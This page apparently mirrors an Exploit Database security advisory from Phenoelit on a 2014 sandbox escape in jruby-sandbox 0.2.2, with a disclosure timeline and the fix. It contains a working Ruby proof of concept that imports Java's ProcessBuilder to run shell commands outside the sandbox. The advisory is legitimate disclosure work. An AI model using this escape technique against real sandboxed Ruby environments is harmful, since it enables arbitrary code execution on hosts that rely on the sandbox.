JRuby Sandbox 0.2.2 – Sandbox Escape

• Exploit Database
• 110 阅读

• 作者： joernchen
  日期： 2014-04-25
• 类别：

  • local
  平台：

  • linux
• 来源：https://www.exploit-db.com/exploits/33028/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52

  Phenoelit Advisory <wir-haben-auch-mal-was-gefunden #0815 +-+++>   [ Authors ] joernchen <joernchen () phenoelit de>   Phenoelit Group (http://www.phenoelit.de)   [ Affected Products ] jruby-sandbox <= 0.2.2 https://github.com/omghax/jruby-sandbox   [ Vendor communication ] 2014-04-22 Send vulnerability details to project maintainer 2014-04-24 Requesting confirmation that details were received 2014-04-24 Maintainer states he is working on a test case 2014-04-24 Maintainer releases fixed version 2014-04-24 Release of this advisory   [ Description ] jruby-sandbox aims to allow safe execution of user given Ruby code within a JRuby [0] runtime. However via import of Java classes it is possible to circumvent those protections and execute arbitrary code outside the sandboxed environment.   [ Example ]   require &apos;sandbox&apos; sand = Sandbox.safe sand.activate!   begin sand.eval("print <code>id</code>") rescue Exception => e puts "fail via Ruby ;)" end puts "Now for some Java"   sand.eval("Kernel.send :java_import, &apos;java.lang.ProcessBuilder&apos;") sand.eval("Kernel.send :java_import, &apos;java.util.Scanner&apos;") sand.eval("s = Java::java.util.Scanner.new( " + "Java::java.lang.ProcessBuilder.new(&apos;sh&apos;,&apos;-c&apos;,&apos;id&apos;)" + ".start.getInputStream).useDelimiter(\"\x00\").next") sand.eval("print s")   [ Solution ] Upgrade to version 0.2.3   [ References ] [0] http://jruby.org/   [ end of file ]